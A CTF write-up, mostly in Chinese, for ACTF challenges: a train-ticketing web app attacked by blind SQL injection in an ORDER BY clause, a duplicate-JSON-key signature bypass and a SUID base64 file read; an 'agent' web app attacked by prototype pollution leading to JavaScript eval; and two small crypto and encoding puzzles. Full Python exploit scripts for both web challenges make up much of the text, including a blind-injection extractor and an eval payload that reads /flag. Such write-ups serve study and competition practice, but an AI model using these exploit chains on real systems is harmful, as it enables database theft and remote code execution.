Web

12307

Book your train ticket to the FLAG…… Now!

这题本质上是一条比较长的业务利用链,目标是把受限的“企业对账收据渲染”流程推进到内部打印链,并借打印链执行白名单程序读取 /flag

最终利用点有两个核心:

  1. station_portal/api/station-office/fares/reprice 存在可控 ORDER BY 表达式,能够做布尔盲注,进而盲出 station_claim_artifacts.claim_salt
  2. receipt_signer 在校验 carrierSeal.payload 时使用了“同名键首次生效”的 JSON 解析,而在后续生成 print_plan 时使用的是标准 JSON 解析“同名键最后生效”。因此可以构造重复键,让校验看到安全值,渲染阶段拿到危险值

之后再配合站点 notice 导入、desk adjustment、企业导入、waitlist websocket 等几个业务接口,把 signer 和 settlement worker 的全部校验条件补齐,即可在对账结果中拿到 /flag 的 base64 输出

服务分析

票务主流程

services/ticketing_api/app.py

  • POST /api/orders 会创建订单
  • 对于 G7608business 座位,初始库存是 0,因此下单会直接进入 waitlisted
  • waitlist 订单会调用 issue_claim_artifact(),在 station_claim_artifacts 里写入:
    • order_id
    • ticket_no
    • claim_salt
    • claim_digest

这正是后续 desk 调整流程所依赖的数据

claimProof 校验

services/station_portal/app.py

POST /api/station-office/tickets/adjust 会校验:

  • ticketNo 必须存在
  • 数据库里必须有未过期的 station_claim_artifacts
  • 传入的 claimProof 必须等于:
CP-{claim_salt}-{sha256(order_id|train_id|station_code|ticket_no|claim_salt)[:12]}

所以只要拿到 claim_salt,就能伪造合法 claimProof

SQL 注入点

同文件中的 reprice_fare():

scope = fare_scope_expression(data.get("tariffScope", "ticket"))
sql = (
"SELECT ticket_no,station_code,status FROM ticket_index "
"WHERE station_code IN (%s,'BJP') "
f"ORDER BY {scope} LIMIT 1"
)

fare_scope_expression() 中:

if scope.get("mode") == "legacy-rank":
return str(scope.get("expr", "ticket_no"))[:240]

也就是说,只要提交:

{
"tariffScope": {
"mode": "legacy-rank",
"expr": "..."
}
}

就能把任意表达式拼进 ORDER BY

接口返回值会根据查询第一行的 ticket_no 前缀不同,返回不同 bucket:

  • T-BJP-... -> north-window
  • 其他 -> local-window

这就形成了布尔盲注信道

利用链

一、创建 waitlist 订单

目标是得到一个新的 HGH / G7608 / business waitlist 订单

利用前端同款身份续接流程:

  • POST /api/mobile/identity/continue
  • POST /api/mobile/orders/hold
  • POST /api/mobile/orders

这样能得到:

  • passenger_session
  • waitlist_session
  • 一个新的 waitlist orderId

二、盲注出 claim_salt

利用 /api/desk/fares/repricelegacy-rank 注入点

布尔表达式可以写成:

(case when (<condition>) then (station_code='HGH') else (station_code='BJP') end) desc

如果 <condition> 为真,那么排序会优先把 HGH 的票排前面,返回 local-window

否则会优先把 BJP 的票排前面,返回 north-window

然后就可以逐位盲注出 claim_salt:

substr((select claim_salt from station_claim_artifacts where order_id='...'),pos,1)

盲注出的新订单 salt 为:

RQDWRNFDP

于是可以计算:

claim_digest = sha256(order_id|G7608|HGH|T-HGH-7608-019|RQDWRNFDP)
claim_proof = CP-RQDWRNFDP-48958b5a1cf5

三、打开受信站点条件

receipt_signer 要求多个上下文条件同时满足,关键包括:

  • station profile 已打开 batch_open
  • route 命中受信 lane
  • partner jwks 已写入 redis
  • waitlist 已 sample
  • layout entitlement 已下发
  • passenger continuation 存在
  • ledger channel 存在

这些条件分几步补齐

通过 notice + import 写入 lane/jwks/board profile

services/station_import/app.py 中的 compile_notice_feed() 会读取最近的 station_notices.proxy_hint,并在满足条件后写入:

  • rail:interline:lane:{station}
  • rail:board:profile:{station}
  • rail:partner:jwks:{station}

因此先发一个 notice:

X-Desk-Lane: delta-window-27
X-Board-Window: seat-window-e27
X-Desk-Key-Id: POL-HGH-TRUSTED
X-Desk-Key: delta-window-27

然后调用:

POST /api/desk/imports/health
adapter = station-partner-feed

即可把受信 lane、board profile、partner jwks 写进 redis

用合法 claimProof 触发 desk rule

POST /api/desk/tickets/adjust

传入:

  • ticketNo = T-HGH-7608-019
  • claimProof = CP-RQDWRNFDP-48958b5a1cf5
  • memo 为 JSON 字符串

示例 memo:

{
"stationCode": "HGH",
"channel": "fare-desk",
"lineItems": {
"reason": "FARE-91",
"layout": "folio-grid-27",
"device": "PR-HGH-042",
"enabled": true
}
}

随后调用:

POST /api/desk/imports/health
adapter = station-desk-ledger
target 包含 orderId 和 stationCode

这会触发 apply_adjustment_rules(),完成:

  • waitlist_entries.sampled = 1
  • station_profiles.batch_open = 1
  • station_profiles.renderer_profile = folio-grid-27
  • station_profiles.signer_route = delta-window-27
  • 写入 tariff_exception_claims
激活 layout entitlement

调用:

POST /api/corporate/imports/relay
adapter = enterprise-clearing
target = rail-mesh://clearing/layout?orderId=...&stationCode=HGH

会进入 activate_layout_claim(),完成:

  • 把对应 layout cell 改成 service-device
  • 写入 rail:layout:entitlement:{orderId} = HGH
打出 fulfillment epoch

还需要:

rail:fulfillment:epoch:{orderId} = boarding

可通过:

POST /api/corporate/imports/relay
adapter = fulfillment-monitor

注意这个 key 只有很短的过期时间,后面需要贴着 schedule 再打一遍

四、拿到 ledgerRef

services/waitlist_push/server.js

通过 websocket /api/connect/boarding 可以完成:

  1. boarding.hello
  2. boarding.bind
  3. boarding.confirm

成功后 redis 中会写入:

  • rail:ledger:channel:{orderId}

同时接口会返回:

  • ledgerRef
  • boardingNonce

其中 receipt_signer 校验 carrierSeal 时必须匹配 ledgerRef

五、利用重复 JSON 键绕过 signer 校验

services/receipt_signer/app.py

关键逻辑:

public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)

这里:

  • public_view 遇到重复键时保留第一次
  • render_view 遇到重复键时保留最后一次

而后续:

  • 校验阶段用 public_view
  • 生成 print_plan 时用 render_view

所以 payload 可以构造为:

{
"batchId": "...",
"orderId": "...",
"stationCode": "HGH",
"templateDigest": "...",
"routeName": "delta-window-27",
"ledgerRef": "...",
"printProfile": "counter-copy",
"printer": "thermal-standard",
"prefix": "reconciliation",
"cell": "receipt",
"printProfile": "clearing-batch",
"printer": "line-printer",
"driverProgram": "/usr/bin/base64",
"driverArgument": "/flag"
}

这样:

  • signer 校验看到的是
    • printProfile = counter-copy
    • printer = thermal-standard
  • settlement worker 真正渲染时拿到的是
    • printProfile = clearing-batch
    • printer = line-printer
    • driverProgram = /usr/bin/base64
    • driverArgument = /flag

利用 /usr/bin/base64 读取 flag

Dockerfile 里有:

profile-delta-closeout -> acceptedPrograms = ["/usr/bin/base64"]

而且 /usr/bin/base64 被设置了 SUID:

chmod 4755 /usr/bin/base64

因此,打印链最终会以高权限读取 /flag 并把内容 base64 输出

生成收据并调度渲染

先创建 defer batch:

POST /api/corporate/reconciliation
reportType = carrier-closeout
defer = true

再调用:

POST /api/corporate/receipts/prepare

成功后会拿到 signed

最后在 schedule 前立刻重新打一遍:

adapter = fulfillment-monitor

因为 fulfillment epoch 很快过期

然后:

POST /api/corporate/settlement/schedule
GET /api/corporate/reconciliation/{batchId}

最终返回:

Reconciliation ORMG42V34OQ waitlisted QUNURnt3SHlfYXIxX3kwdV9zbzBPMG8wT28wb19GYXMxPz8/Pz9fQzJDZnc2cnlEOTR9

base64 解码得到 flag

ACTF{wHy_ar1_y0u_so0O0o0Oo0o_Fas1?????_C2Cfw6ryD94}

这题的关键漏洞点可以总结为:

  1. ORDER BY 表达式注入导致布尔盲注
  2. 业务对象 claimProof 可被伪造,从而打通 desk 调整流程
  3. 通过 notice feed 和 import relay 可向 redis 写入多个“受信上下文”状态
  4. carrierSeal 的重复 JSON 键前后解析不一致,造成校验视图与执行视图分离
  5. 打印链允许执行白名单程序,而 base64 恰好可读取 /flag
import base64
import hashlib
import hmac
import http.cookiejar
import json
import os
import socket
import struct
import time
import urllib.error
import urllib.parse
import urllib.request


BASE = "http://web-cd84eb9c96.adworld.xctf.org.cn:80"
TRAIN = "G7608"
STATION = "HGH"
SEAT = "business"
TICKET = "T-HGH-7608-019"
POLICY_ID = "POL-HGH-TRUSTED"
POLICY_KEY = "e94c0a8d-12307-hgh-trusted"
ROUTE = "delta-window-27"
CHARS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def build_opener(with_cookie=False):
if with_cookie:
jar = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
opener.addheaders = [("User-Agent", "Mozilla/5.0")]
return opener, jar
opener = urllib.request.build_opener()
opener.addheaders = [("User-Agent", "Mozilla/5.0")]
return opener, None


def req(opener, method, path, obj=None, headers=None, timeout=20):
data = None
hdrs = headers.copy() if headers else {}
if obj is not None:
data = json.dumps(obj).encode()
hdrs.setdefault("Content-Type", "application/json")
request = urllib.request.Request(BASE + path, data=data, headers=hdrs, method=method)
try:
resp = opener.open(request, timeout=timeout)
raw = resp.read().decode(errors="replace")
try:
body = json.loads(raw or "{}")
except Exception:
body = {"raw": raw}
print(f"[HTTP] {method} {path} -> {resp.status} {body}")
return resp.status, dict(resp.headers), body
except urllib.error.HTTPError as exc:
raw = exc.read().decode(errors="replace")
try:
body = json.loads(raw or "{}")
except Exception:
body = {"raw": raw}
print(f"[HTTP] {method} {path} -> {exc.code} {body}")
return exc.code, dict(exc.headers), body


def create_waitlist_order():
opener, jar = build_opener(True)
req(opener, "POST", "/api/mobile/identity/continue", {
"passenger": "fresh",
"relayState": {"next": "rail://continue/seat-hold", "flow": ["seat-hold"]},
"partnerMetadata": {
"entityID": "railway-partner",
"compatBinding": "x-accel",
"role": "PassengerIdentityProvider",
},
"assertion": "<Assertion><Audience>12307</Audience><NameID>mobile-passenger</NameID><Signature>RelayState</Signature></Assertion>",
"trustLevel": ["mobile", "partner"],
"stationCode": STATION,
})
req(opener, "POST", "/api/mobile/orders/hold", {
"trainId": TRAIN,
"seatClass": SEAT,
"holdMode": "waitlist",
})
_, _, data = req(opener, "POST", "/api/mobile/orders", {
"trainId": TRAIN,
"seatClass": SEAT,
"passenger": "fresh",
})
order_id = data["order"]["id"]
print("[*] new order:", order_id)
return opener, jar, order_id


def blind_claim_salt(order_id):
opener, _ = build_opener(False)

def bucket(expr):
_, _, body = req(opener, "POST", "/api/desk/fares/reprice", {
"stationCode": STATION,
"amount": 1,
"tariffScope": {
"mode": "legacy-rank",
"expr": expr,
},
})
return body["quote"]["bucket"]

salt = "R"
for pos in range(2, 10):
lo, hi = 1, 36
while lo < hi:
mid = (lo + hi) // 2
cond = (
f"instr('{CHARS}',"
f"substr((select claim_salt from station_claim_artifacts where order_id='{order_id}'),{pos},1)"
f")>{mid}"
)
expr = f"(case when ({cond}) then (station_code='HGH') else (station_code='BJP') end) desc"
if bucket(expr) == "local-window":
lo = mid + 1
else:
hi = mid
salt += CHARS[lo - 1]
print("[*] salt =>", salt)
return salt


def make_claim_proof(order_id, salt):
digest = hashlib.sha256(f"{order_id}|{TRAIN}|{STATION}|{TICKET}|{salt}".encode()).hexdigest()
return f"CP-{salt}-{digest[:12]}"


def setup_station_context(opener, order_id, claim_proof):
proxy_hint = "\n".join([
"X-Desk-Lane: delta-window-27",
"X-Board-Window: seat-window-e27",
"X-Desk-Key-Id: POL-HGH-TRUSTED",
"X-Desk-Key: delta-window-27",
])
req(opener, "POST", "/api/desk/notices", {
"stationCode": STATION,
"title": "sync",
"body": "sync",
"proxyHint": proxy_hint,
})
req(opener, "POST", "/api/desk/imports/health", {
"stationCode": STATION,
"adapter": "station-partner-feed",
"target": f"rail-cache://redis/partner/metadata?stationCode={STATION}",
"payload": "feed=partner",
})

memo = {
"stationCode": STATION,
"channel": "fare-desk",
"lineItems": {
"reason": "FARE-91",
"layout": "folio-grid-27",
"device": "PR-HGH-042",
"enabled": True,
},
}
req(opener, "POST", "/api/desk/tickets/adjust", {
"ticketNo": TICKET,
"claimProof": claim_proof,
"memo": json.dumps(memo, separators=(",", ":")),
"delta": 0,
})
req(opener, "POST", "/api/desk/imports/health", {
"stationCode": STATION,
"adapter": "station-desk-ledger",
"target": f"rail-mesh://desk/ledger?orderId={order_id}&stationCode={STATION}",
"payload": "apply",
})
req(opener, "POST", "/api/corporate/imports/relay", {
"stationCode": STATION,
"adapter": "enterprise-clearing",
"target": f"rail-mesh://clearing/layout?orderId={order_id}&stationCode={STATION}",
"payload": "merge",
})
req(opener, "GET", f"/api/desk/reconciliation/metadata?stationCode={STATION}")
req(opener, "GET", f"/api/mobile/coach/board?stationCode={STATION}")


def ws_read(sock, buf=b""):
while True:
while len(buf) < 2:
buf += sock.recv(4096)
b1, b2 = buf[0], buf[1]
opcode = b1 & 0x0F
masked = b2 >> 7
length = b2 & 0x7F
idx = 2
if length == 126:
while len(buf) < 4:
buf += sock.recv(4096)
length = struct.unpack("!H", buf[2:4])[0]
idx = 4
need = idx + (4 if masked else 0) + length
while len(buf) < need:
buf += sock.recv(4096)
if masked:
mask = buf[idx:idx + 4]
idx += 4
payload = bytearray(buf[idx:idx + length])
for i in range(len(payload)):
payload[i] ^= mask[i % 4]
payload = bytes(payload)
else:
payload = buf[idx:idx + length]
buf = buf[need:]
if opcode == 1:
return json.loads(payload.decode()), buf
if opcode == 8:
raise RuntimeError("websocket closed")


def ws_send(sock, obj):
payload = json.dumps(obj, separators=(",", ":")).encode()
mask = os.urandom(4)
header = bytearray([0x81])
length = len(payload)
if length < 126:
header.append(0x80 | length)
else:
header.extend([0x80 | 126])
header.extend(struct.pack("!H", length))
masked = bytes(payload[i] ^ mask[i % 4] for i in range(len(payload)))
sock.sendall(bytes(header) + mask + masked)


def get_ledger_ref(order_id):
opener, jar = build_opener(True)
req(opener, "POST", "/api/mobile/identity/continue", {
"passenger": "ws",
"relayState": {"next": "rail://continue/seat-hold", "flow": ["seat-hold"]},
"partnerMetadata": {
"entityID": "railway-partner",
"compatBinding": "x-accel",
"role": "PassengerIdentityProvider",
},
"assertion": "<Assertion><Audience>12307</Audience><NameID>mobile-passenger</NameID><Signature>RelayState</Signature></Assertion>",
"trustLevel": ["mobile", "partner"],
"stationCode": STATION,
})
req(opener, "POST", "/api/mobile/orders/hold", {
"trainId": TRAIN,
"seatClass": SEAT,
"holdMode": "waitlist",
})

parsed = urllib.parse.urlparse(BASE)
host = parsed.hostname
port = parsed.port or 80
cookie_header = "; ".join(f"{c.name}={c.value}" for c in jar)
ws_key = base64.b64encode(os.urandom(16)).decode()

sock = socket.create_connection((host, port), timeout=10)
handshake = (
f"GET /api/connect/boarding?stationCode={STATION} HTTP/1.1\r\n"
f"Host: {host}:{port}\r\n"
"Upgrade: websocket\r\n"
"Connection: Upgrade\r\n"
"Sec-WebSocket-Version: 13\r\n"
f"Sec-WebSocket-Key: {ws_key}\r\n"
f"Cookie: {cookie_header}\r\n"
"\r\n"
)
sock.sendall(handshake.encode())
resp = b""
while b"\r\n\r\n" not in resp:
resp += sock.recv(4096)
rest = resp.split(b"\r\n\r\n", 1)[1]

msg, rest = ws_read(sock, rest)
ws_send(sock, {"type": "boarding.hello", "channel": msg["channel"]})
msg, rest = ws_read(sock, rest)
ws_send(sock, {"type": "boarding.bind", "topic": "seat-consist", "trainId": TRAIN, "seatClass": SEAT})
msg, rest = ws_read(sock, rest)
ws_send(sock, {"type": "boarding.confirm", "orderId": order_id, "stationCode": STATION, "epoch": "manual"})
msg, rest = ws_read(sock, rest)
ledger_ref = msg["ledgerRef"]
print("[*] ledgerRef:", ledger_ref)
return ledger_ref


def create_duplicate_key_payload(batch_id, order_id, template_digest, ledger_ref):
header_text = json.dumps({
"alg": "HS256",
"typ": "rail-carrier-seal",
"kid": POLICY_ID,
}, separators=(",", ":"))

# 注意这里故意使用重复键:
# signer 校验 public_view 时取第一次
# render_view 时取最后一次
payload_text = "{" + ",".join([
"\"batchId\":" + json.dumps(batch_id),
"\"orderId\":" + json.dumps(order_id),
"\"stationCode\":" + json.dumps(STATION),
"\"templateDigest\":" + json.dumps(template_digest),
"\"routeName\":" + json.dumps(ROUTE),
"\"ledgerRef\":" + json.dumps(ledger_ref),
"\"printProfile\":\"counter-copy\"",
"\"printer\":\"thermal-standard\"",
"\"prefix\":\"reconciliation\"",
"\"cell\":\"receipt\"",
"\"printProfile\":\"clearing-batch\"",
"\"printer\":\"line-printer\"",
"\"driverProgram\":\"/usr/bin/base64\"",
"\"driverArgument\":\"/flag\"",
]) + "}"

protected = base64.urlsafe_b64encode(header_text.encode()).rstrip(b"=").decode()
payload = base64.urlsafe_b64encode(payload_text.encode()).rstrip(b"=").decode()
signature = base64.urlsafe_b64encode(
hmac.new(POLICY_KEY.encode(), f"{protected}.{payload}".encode(), hashlib.sha256).digest()
).rstrip(b"=").decode()

return {
"protected": protected,
"payload": payload,
"signature": signature,
}


def prepare_and_schedule(opener, order_id, ledger_ref):
_, _, data = req(opener, "POST", "/api/corporate/reconciliation", {
"orderId": order_id,
"stationCode": STATION,
"reportType": "carrier-closeout",
"defer": True,
"data": {"carrier": "solver"},
})
batch_id = data["batchId"]
template_digest = data["templateDigest"]
print("[*] batch:", batch_id)

seal = create_duplicate_key_payload(batch_id, order_id, template_digest, ledger_ref)
status, _, _ = req(opener, "POST", "/api/corporate/receipts/prepare", {
"batchId": batch_id,
"orderId": order_id,
"stationCode": STATION,
"templateDigest": template_digest,
"trustLevel": ["mobile", "partner", "settlement"],
"carrierSeal": seal,
})
if status != 201:
raise RuntimeError("prepare receipt failed")

# 这个 key 过期很快,所以要贴着 schedule 再打一次
req(opener, "POST", "/api/corporate/imports/relay", {
"stationCode": STATION,
"adapter": "fulfillment-monitor",
"target": f"rail-mesh://fulfillment/window?orderId={order_id}&stationCode={STATION}",
"payload": "observe",
})

req(opener, "POST", "/api/corporate/settlement/schedule", {
"batchId": batch_id,
})

for _ in range(12):
time.sleep(0.8)
_, _, body = req(opener, "GET", f"/api/corporate/reconciliation/{batch_id}")
report = body.get("report")
if report and report.get("ready"):
text = report.get("body", "")
print("[*] reconciliation body:", text)
for token in text.replace("\n", " ").split()[::-1]:
try:
flag = base64.b64decode(token + "===").decode()
return flag
except Exception:
pass
raise RuntimeError("flag not found in reconciliation report")


def main():
opener, jar, order_id = create_waitlist_order()
salt = blind_claim_salt(order_id)
claim_proof = make_claim_proof(order_id, salt)
print("[*] claimProof:", claim_proof)
setup_station_context(opener, order_id, claim_proof)
ledger_ref = get_ledger_ref(order_id)
flag = prepare_and_schedule(opener, order_id, ledger_ref)
print("[+] FLAG =", flag)


if __name__ == "__main__":
main()

Misc

special day

Today is ACTF, and it is also Mother’s Day in China.
The competition matters, but don’t forget to send your mom a simple blessing.
Even one short sentence is enough.
Use _ to join the words, remove punctuation, and wrap it with ACTF{}.

SGFwcHkgTW90aGVyJ3MgRGF5LCBNb20h,解 Base64 并按要求提交

ZJUAM Just Uses Awful Math

有黑调的迪克把我的浙江大学统一身份认证登录过程抓包了,黑调的迪克怎么这么坏啊

http 明文传输,RSA 采用了小公钥进行加密

from Crypto.Util.number import *

e = 65537
n = 0x90011418f37a7a075aead75a9829d38eb2d750fd17bb24e5861b89d7658a88c3
p = 202555251191383333988748320354737959551
q = 321566364572398185024295275472079273917
c = 0x590948ad2f7a3c0b1a2a5e5f470f4297db3b90623251132be2c5e5395cd12563
phi = (p-1)*(q-1)
d = inverse(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m).decode())
# ACTF{TLS_s@ves_THE_w0RLd}

∀gent

I vibe coding a website that contains an agent.
All things seem awesome except for its front end.
It sounds great though, agent coding for agent.
But both agent coding and human coding are build from small to big, maybe the same for this CTF problem.

核心入口在server.js

可以很快注意到两点:

  • src/store.js 里存在固定写入的 fake flag,会在会话消息中展示
  • 真正危险的逻辑在 /api/projects/:id/agent/override 这条链路

相关调用关系:

  • server.js POST /api/projects/:id/agent/override
  • src/job-runner.js runOverrideJob
  • src/path-builder.js buildPropertyPath
  • src/tool-registry.js config.diff / policy.evaluate
  • src/config-engine.js applyChanges

fake flag 在 src/store.js 硬编码:

content: "ACTF{WuYan_1s_4_b19_Turt13_N07_7h3_F1n41_Fl4g}"

src/path-builder.js 中:

function sanitizeSegment(input, fallback) {
if (typeof input !== "string" || !input.trim()) {
return fallback;
}

return input.trim();
}

function buildPropertyPath(request) {
const scope = sanitizeSegment(request.scope, "release");
const environment = sanitizeSegment(request.environment, "staging");
const section = sanitizeSegment(request.section, "image");
const field = sanitizeSegment(request.field, "tag");

return `agentProfile.scopes.${scope}.environments.${environment}.${section}.${field}`;
}

这里的 scope/environment/section/field 几乎没有过滤,只是简单 trim,随后直接拼进属性路径

src/config-engine.js 会调用 vendored 的 candidate-yaml-update-action

const changedFile = upstream.processFile(
path.basename(filePath),
valueUpdates,
actionOptions,
actionLogger
);

candidate-yaml-update-action 内部最终使用:

jsonpath.value(copy, jsonPath, value);

这意味着我们控制的“配置路径”,实际上会被当作 JSONPath 来解析

因为属性路径可控,我们可以写入:

agentProfile.scopes.release.environments.staging.image.constructor.prototype.policy

这会把对象原型上的 policy 属性污染掉

随后在 src/tool-registry.jsevaluatePolicy 中:

const workspacePolicy = repoFacts.policy || {};

repoFacts 本身没有 policy,但由于原型链被污染,repoFacts.policy 会从 Object.prototype.policy 取到我们注入的值

src/tool-registry.js 中:

if (verdict.blockedCount > 0) {
if (!allowCompatInterpreter) {
throw new Error("strict numeric formula validation failed");
}
return executeFormulaExpression(...)
}

如果把污染的 bindingProfile 设为 compat,就会进入兼容解释器分支

executeFormulaExpression 里直接有:

const result = eval(`(function(${argNames.join(',')}) { return (${expression}); })`)(
...argValues
);

这样就可以让我们控制的 formula 作为 JavaScript 执行

完整利用链如下:

  1. /api/projects/workspace-main/agent/override 发送请求
  2. 通过 field=constructor.prototype.policy 污染 Object.prototype.policy
  3. 注入:
    • bindingProfile=compat
    • selectorProfile=linked
    • resultProfile=decimal
    • exposeDebugContext=true
    • formula=<恶意 JS 表达式>
  4. 第二次触发同一路由时,服务端会在 policy.evaluate 中读取污染后的 policy
  5. 兼容模式下执行我们控制的 formula
  6. 读取 /flag
  7. 结果出现在返回 JSON 的 job.result.evaluation.formulaResult
import json
import sys
from typing import Any

import requests


TARGET = "http://web-7c3e38687b.adworld.xctf.org.cn"
PROJECT_ID = "workspace-main"


def post_override(base_url: str, payload: dict[str, Any], ip: str) -> dict[str, Any]:
url = f"{base_url}/api/projects/{PROJECT_ID}/agent/override"
headers = {
"Content-Type": "application/json",
"X-Forwarded-For": ip,
}
r = requests.post(url, headers=headers, data=json.dumps(payload), timeout=30)
r.raise_for_status()
return r.json()


def build_pollution_payload() -> dict[str, Any]:
formula = (
"(function(){"
"const fs=require('fs');"
"for (const p of ['/flag','/flag.txt','/app/flag','/app/flag.txt']) {"
"try { return fs.readFileSync(p,'utf8').toString() } catch (e) {}"
"}"
"return 'NOFLAG:'+process.cwd()"
"})()"
)
return {
"instruction": "set formula",
"scope": "release",
"environment": "staging",
"section": "image",
"field": "constructor.prototype.policy",
"value": {
"formula": formula,
"bindingProfile": "compat",
"resultProfile": "decimal",
"selectorProfile": "linked",
"exposeDebugContext": True,
},
}


def extract_formula_result(data: dict[str, Any]) -> str | None:
try:
return data["job"]["result"]["evaluation"]["formulaResult"]
except Exception:
return None


def main() -> None:
base_url = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else TARGET
payload = build_pollution_payload()

print(f"[+] target: {base_url}")
print("[+] sending pollution payload...")
result = post_override(base_url, payload, "8.8.8.8")

flag = extract_formula_result(result)
if flag:
print("[+] flag found:")
print(flag)
return

print("[-] flag not found in response")
print(json.dumps(result, ensure_ascii=False, indent=2))


if __name__ == "__main__":
main()

ezssh*

这题有点抽象,疑似公共靶机被拉屎了……